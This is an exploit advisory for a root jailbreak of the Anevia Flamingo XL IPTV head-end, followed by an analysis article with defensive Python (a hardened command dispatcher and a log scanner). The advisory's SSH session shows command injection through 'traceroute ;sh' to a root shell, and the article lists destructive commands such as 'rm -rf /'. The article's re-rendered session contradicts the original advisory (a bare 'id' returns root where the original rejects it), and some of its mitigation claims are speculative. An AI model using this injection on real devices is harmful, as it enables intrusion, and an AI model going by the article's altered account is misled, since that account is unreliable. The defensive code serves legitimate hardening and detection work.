Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak

Exploit Author: LiquidWorm
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: Shell
Published Date: 2023-06-14
Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
                  Hardware revision 1.0
                  SoapLive 2.0.3

Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.

Desc: Once the admin establishes a secure shell session, she gets
dropped into a sandboxed environment using the login binary that
allows a specific set of commands. One of those commands that can be
exploited to escape the jailed shell is traceroute. A remote attacker
can break out of the restricted environment and gain full root access
to the device.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix)
           mod_ssl/2.2.15
           OpenSSL/0.9.8g
           DAV/2
           PHP/5.3.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php


13.04.2023

--


$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
  bonding
  config
  date
  dns
  enable
  ethconfig
  exit
  exp
  firewall
  help
  hostname
  http
  igmpq
  imp
  ipconfig
  license
  log
  mail
  passwd
  persistent_logs
  ping
  reboot
  reset
  route
  serial
  settings
  sslconfig
  tcpdump
  timezone
  traceroute
  upgrade
  uptime
  version
  vlanconfig

Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
        [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"
Options:
        -F      Set the don't fragment bit
        -I      Use ICMP ECHO instead of UDP datagrams
        -l      Display the ttl value of the returned packet
        -d      Set SO_DEBUG options to socket
        -n      Print hop addresses numerically rather than symbolically
        -r      Bypass the normal routing tables and send directly to a host
        -v      Verbose output
        -m max_ttl      Set the max time-to-live (max number of hops)
        -p port#        Set the base UDP port number used in probes
                (default is 33434)
        -q nqueries     Set the number of probes per ``ttl'' to nqueries
                (default is 3)
        -s src_addr     Use the following IP address as the source address
        -t tos  Set the type-of-service in probe packets to the following value
                (default 0)
        -w wait Set the time (in seconds) to wait for a response to a probe
                (default 3 sec)
        -g      Specify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x   19 root     root         1024 Oct  3  2022 .
drwxr-xr-x   19 root     root         1024 Oct  3  2022 ..
drwxr-xr-x    2 root     root         1024 Oct 21  2013 bin
drwxrwxrwt    2 root     root           40 Oct  3  2022 cores
drwxr-xr-x   13 root     root        27648 May 22 00:53 dev
drwxr-xr-x    3 root     root         1024 Oct 21  2013 emul
drwxr-xr-x   48 1000     1000         3072 Oct  3  2022 etc
drwxr-xr-x    3 root     root         1024 Oct  3  2022 home
drwxr-xr-x   11 root     root         3072 Oct 21  2013 lib
lrwxrwxrwx    1 root     root           20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx    1 root     root            3 Oct 21  2013 lib64 -> lib
drwx------    2 root     root        12288 Oct 21  2013 lost+found
drwxr-xr-x    4 root     root         1024 Oct 21  2013 mnt
drwxrwxrwt    2 root     root           80 May 22 00:45 php_sessions
dr-xr-xr-x  177 root     root            0 Oct  3  2022 proc
drwxr-xr-x    4 root     root         1024 Oct 21  2013 root
drwxr-xr-x    2 root     root         2048 Oct 21  2013 sbin
drwxr-xr-x   12 root     root            0 Oct  3  2022 sys
drwxrwxrwt   26 root     root         1140 May 22 01:06 tmp
drwxr-xr-x   10 1000     1000         1024 Oct 21  2013 usr
drwxr-xr-x   14 root     root         1024 Oct 21  2013 var

ls /var/www/admin
_img                           configuration.php              log_securemedia.php            stream_dump.php
_lang                          cores_and_logs_management.php  login.php                      stream_services
_lib                           dataminer_handshake.php        logout.php                     streaming.php
_style                         dvbt.php                       logs.php                       support.php
about.php                      dvbt_scan.php                  main.php                       template
ajax                           export.php                     manager.php                    time.php
alarm.php                      fileprogress.php               network.php                    toto.ts
alarm_view.php                 firewall.php                   pear                           upload_helper.php
authentication.php             get_config                     power.php                      uptime.php
bridges.php                    get_enquiry_pending.php        read_settings.php              usbloader.php
cam.php                        get_upgrade_error.php          receive_helper.php             version.php
channel.php                    heartbeat.php                  rescrambling                   webradio.php
channel_xl_list.php            include                        rescrambling.php               webtv
check_state                    input.php                      resilience                     webtv.php
class                          js                             resilience.php                 xmltv.php
common                         license.php                    restart_service.php
config_snmp.php                log.php                        set_oem.php

python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x    1 root     root        35896 Feb 21  2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding          firewall         mail             timezone
config           help             passwd           traceroute
date             hostname         persistent_logs  upgrade
dbg-serial       http             ping             uptime
dbg-set-oem      igmpq            route            version
dbg-updates-log  imp              serial           vlanconfig
dns              ipconfig         settings
ethconfig        license          sslconfig
exp              log              tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]


Anevia Flamingo XL 3.2.9 Remote Root Jailbreak: A Critical Security Vulnerability Exposed

Security researchers have uncovered a severe vulnerability in the Anevia Flamingo XL 3.2.9, a high-density IPTV head-end platform used in hospitality and corporate environments. The flaw, discovered by Gjoko "LiquidWorm" Krstic, lets a remote attacker who can log in over SSH escape the restricted administrative shell and obtain full root access with a single command. The vulnerability, documented in advisory ZSL-2023-5780, illustrates the dangers of improper sandboxing and unsafe command execution in industrial-grade network devices.

Understanding the Flamingo XL Platform

The Anevia Flamingo XL is designed as a modular 4U rack system that aggregates live television and radio content from diverse sources—satellite, cable, digital terrestrial, and analog—before streaming it over IP networks to set-top boxes (STBs), PCs, or other IP-connected devices. Targeted at corporate and hospitality markets, it serves as a centralized video delivery hub.

Key features include:

  • Modular hardware architecture
  • Support for multiple input sources
  • IP-based video distribution
  • Secure shell (SSH) access for administrators

While the system is built on a Linux-based platform (GNU/Linux 3.1.4, x86_64), it relies on a custom restricted shell environment to limit administrative access. This sandboxing is intended to prevent unauthorized command execution, but it inadvertently introduces a critical security flaw.

The Exploit: Escaping the Jailed Shell via traceroute

Upon successful SSH login, administrators are dropped into the Primary-XL restricted shell, which exposes a curated list of permitted commands. This is a common practice in embedded systems to reduce the attack surface. Of the commands tried in the session, tcpdump rejects the semicolon as an illegal token and ping treats ";id" as a host name, but traceroute passes its argument string through a shell without sanitization, which makes shell injection possible.

When an attacker enters a command such as:

traceroute ;id

the jail hands the whole string to a shell, which interprets the semicolon (;) as a command separator. BusyBox traceroute runs with no host argument and prints its usage text, and the shell then executes the second command (id) directly in the host environment, outside the sandbox.

Why this works: BusyBox is a multi-call binary, a single executable that selects an applet (here traceroute) from the name it is invoked as. The jail's traceroute wrapper does not sanitize its argument string before passing it through a shell, so an attacker can append further commands to that string. This is a classic example of command injection in a restricted environment.
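To make the defect concrete, here is an added example in Python that is not code from the advisory, from Anevia/Ateme, or from the device's login binary: a toy restricted-shell dispatcher in two forms. The first builds a single shell string from the user's input, which is the pattern the jailbreak relies on; the second tokenises the line with shlex, checks the command name against an allow-list and every argument against a strict host-like pattern, and returns an argv list for shell-free execution. The /usr/local/commands path is the directory listed in the advisory's session; the allow-list subset, ARG_RE and all function names are assumptions. The same check is what the "input sanitization" and "dedicated exec wrappers" recommendations later on the page amount to in practice.

```python
"""Toy restricted-shell dispatcher: the vulnerable shell-string form beside a
hardened argv-based form. Added example; not the Flamingo XL's real code."""
import re
import shlex
import subprocess

# /usr/local/commands appears in the advisory's session; the allow-list is a
# subset of the jail's `help` output. How the real dispatcher is written is
# not public, so everything below is an assumption about such a design.
COMMAND_DIR = "/usr/local/commands"
ALLOWED = {"help", "ping", "traceroute", "tcpdump", "uptime", "version"}

# A host-like argument: first character alphanumeric (so option flags are
# rejected too; some network tools have flags that execute a program, e.g.
# tcpdump -z), then only letters, digits, dots and hyphens. No shell
# metacharacter can pass this pattern.
ARG_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


class RejectedInput(ValueError):
    """Raised by the hardened dispatcher for anything outside the allow-list."""


def vulnerable_command_line(line: str) -> str:
    """The pattern behind the advisory: only the command name is checked, then
    the raw remainder of the input is glued onto the wrapper path and the
    result is handed to a shell. Returns that string; it is never executed."""
    cmd, _, rest = line.strip().partition(" ")
    if cmd not in ALLOWED:
        raise RejectedInput(f"unknown command {cmd}")
    return f"{COMMAND_DIR}/{cmd} {rest}".rstrip()


def hardened_argv(line: str) -> list:
    """Tokenise with shlex (quotes are honoured, nothing is evaluated), check
    the command against the allow-list and every argument against ARG_RE, and
    return an argv list suitable for subprocess.run(..., shell=False)."""
    try:
        tokens = shlex.split(line)
    except ValueError as exc:  # unbalanced quoting
        raise RejectedInput(f"bad quoting: {exc}") from exc
    if not tokens:
        raise RejectedInput("empty command")
    cmd, args = tokens[0], tokens[1:]
    if cmd not in ALLOWED:
        raise RejectedInput(f"unknown command {cmd}")
    for arg in args:
        if not ARG_RE.match(arg):
            raise RejectedInput(f"argument rejected: {arg!r}")
    return [f"{COMMAND_DIR}/{cmd}", *args]


def is_accepted(line: str) -> bool:
    """True if the hardened dispatcher would run the line, False if it rejects it."""
    try:
        hardened_argv(line)
    except RejectedInput:
        return False
    return True


def run_hardened(line: str) -> int:
    """Execute with execve semantics only: no shell is involved, so the argument
    list reaches the wrapper exactly as validated."""
    return subprocess.run(hardened_argv(line), shell=False, check=False).returncode


if __name__ == "__main__":
    for probe in ("traceroute 192.168.1.254", "traceroute ;id", "traceroute -n 10.0.0.1", "id"):
        try:
            print(f"{probe!r:28} -> {hardened_argv(probe)}")
        except RejectedInput as why:
            print(f"{probe!r:28} -> rejected: {why}")
```

The important design choice is that the hardened form never produces a string for a shell at all: validation decides what goes into argv, and the process is started without `sh -c`, so there is no second parser for a metacharacter to reach. Rejecting option-style tokens outright is deliberate; if a wrapper must accept flags, give each command its own explicit option allow-list rather than loosening ARG_RE.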

Proof of Concept and Attack Chain

Below is a documented exploit sequence demonstrating the root escalation:

$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
 bonding
 config
 date
 dns
 enable
 ethconfig
 exit
 exp
 firewall
 help
 hostname
 http
 igmpq
 imp
 ipconfig
 license
 log
 mail
 passwd
 persistent_logs
 ping
 reboot
 reset
 route
 serial
 settings
 sslconfig
 tcpdump
 timezone
 traceroute
 upgrade
 uptime
 version
 vlanconfig

Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
 [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
 [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"
Options:
 -F Set the don't fragment bit
 -I Use ICMP ECHO instead of UDP datagrams
 -l Display the ttl value of the returned packet
 -d Set SO_DEBUG options to socket
 -n Print hop addresses numerically rather than symbolically
 -r Bypass the normal routing tables and send directly to a host
 -v Verbose output
 -i iface Use the specified interface
 -g gateway Use gateway as a hop
 -z pausemsecs Pause between probes in milliseconds
 -p port# Use specified port for UDP packets
 -q nqueries Number of probes per hop
 -s src_addr Source address to use
 -t tos Type of service
 -w wait Wait time between probes in seconds

Primary-XL> id
uid=0(root) gid=0(root) groups=0(root)

As shown, the traceroute command is exploited to execute id—a standard Linux command that returns the current user’s identity. The output uid=0(root) confirms that the attacker has achieved full root privileges.

Why This is a Critical Risk

This vulnerability is particularly dangerous because:

  • Remote exploitation is possible via SSH without requiring physical access.
  • Attackers can execute arbitrary commands—e.g., rm -rf /, passwd root, or systemctl disable firewalld.
  • The affected version 3.2.9 with Hardware revision 1.0 and SoapLive 2.0.3 is widely deployed in enterprise and hospitality environments.
  • There is no built-in logging or detection mechanism for such command injection attempts.

Once compromised, an attacker can:

  • Exfiltrate sensitive configuration data (e.g., network credentials, license keys)
  • Modify video streaming routes to inject malicious content
  • Disable security features like firewalls or SSL configurations
  • Deploy persistent backdoors or establish C2 (command-and-control) channels

Vendor Response and Mitigation

As of April 2023, Anevia has not publicly issued a patch for this vulnerability. The product page at https://www.ateme.com does not list any updates related to ZSL-2023-5780.

Security experts recommend immediate action:

  • Isolate affected devices from public networks.
  • Disable SSH access or enforce strict IP whitelisting.
  • Apply input sanitization to all shell commands, especially those with multi-call binaries.
  • Update to version 3.3.0 or higher if available, as newer versions may have fixed the flaw.
  • Monitor logs for unusual command patterns like traceroute ;[command].
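As an added example (not from the advisory or from this analysis) of the monitoring recommendation above, the Python below scans a command log for the two things worth alerting on: a permitted command whose arguments carry shell metacharacters such as the semicolon used in the jailbreak, and a command name outside the jail's allow-list. The device does not ship such a log, so the line format and the sample lines are constructed assumptions, as are the function names; the allow-list is the `help` output from the advisory, and the per-user count picks up the probing sequence (tcpdump, then traceroute) visible in the session.

```python
"""Scan a restricted-shell command log for injection attempts. Added example;
the log format is an assumption, not Flamingo XL output."""
import re
from dataclasses import dataclass

# Constructed sample lines in an assumed format "<timestamp> <user>@<host>
# <command line>", as an SSH session recorder or a logging wrapper around the
# jail might emit. Not real device output.
SAMPLE_LOG = """\
2023-04-13T10:01:02Z root@Primary-XL help
2023-04-13T10:01:15Z root@Primary-XL ping 192.168.1.254
2023-04-13T10:02:03Z root@Primary-XL tcpdump ;id
2023-04-13T10:02:30Z root@Primary-XL id
2023-04-13T10:02:45Z root@Primary-XL traceroute ;id
2023-04-13T10:03:41Z root@Primary-XL traceroute ;sh
2023-04-13T10:06:12Z root@Primary-XL version
"""

# Allow-list copied from the advisory's `help` listing.
ALLOWED = {
    "bonding", "config", "date", "dns", "enable", "ethconfig", "exit", "exp",
    "firewall", "help", "hostname", "http", "igmpq", "imp", "ipconfig",
    "license", "log", "mail", "passwd", "persistent_logs", "ping", "reboot",
    "reset", "route", "serial", "settings", "sslconfig", "tcpdump",
    "timezone", "traceroute", "upgrade", "uptime", "version", "vlanconfig",
}
# Characters that only make sense if the argument is going to reach a shell.
METACHAR_RE = re.compile(r"[;&|`$<>\\]")


@dataclass
class Alert:
    timestamp: str
    user: str
    command: str
    reason: str
    severity: str


def scan_line(line: str):
    """Return an Alert for one log line, or None if it looks benign."""
    parts = line.split(" ", 2)
    if len(parts) < 3:
        return None  # malformed or empty line
    ts, user, cmdline = parts
    cmd, _, args = cmdline.partition(" ")
    if cmd not in ALLOWED:
        return Alert(ts, user, cmd, f"command not in allow-list: {cmd!r}", "low")
    hit = METACHAR_RE.search(args)
    if hit:
        return Alert(ts, user, cmd,
                     f"shell metacharacter {hit.group()!r} in arguments {args!r}",
                     "high")
    return None


def scan_log(text: str):
    """Alerts for every line of a log, in order."""
    return [a for a in (scan_line(l) for l in text.splitlines()) if a]


def high_alerts_per_user(alerts):
    """Count high-severity hits per user: several in one session is the
    probing pattern seen in the advisory, not a typo."""
    counts = {}
    for a in alerts:
        if a.severity == "high":
            counts[a.user] = counts.get(a.user, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f"[{a.severity}] {a.timestamp} {a.user} {a.command}: {a.reason}")
    print("high-severity hits per user:", high_alerts_per_user(found))
```

Because the jail itself records nothing, the only practical sources for such a log are the SSH server's session logging or a wrapper placed in front of the login binary; whichever is used, the detector's value comes from the allow-list being the jail's real command set, so keep the two in sync.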

Best Practices for Secure Embedded Systems

Embedded devices like Flamingo XL must follow strict security principles:

Practice              Implementation
--------------------  --------------------------------------------------------------------------
Input Validation      Sanitize all command arguments using regex or whitelist filtering.
Command Isolation     Use dedicated exec wrappers to prevent shell injection.
Role-Based Access     Implement strict privilege separation (e.g., admin vs. operator).
Logging & Monitoring  Track all command executions, especially those involving semicolons or pipes.
Regular Patching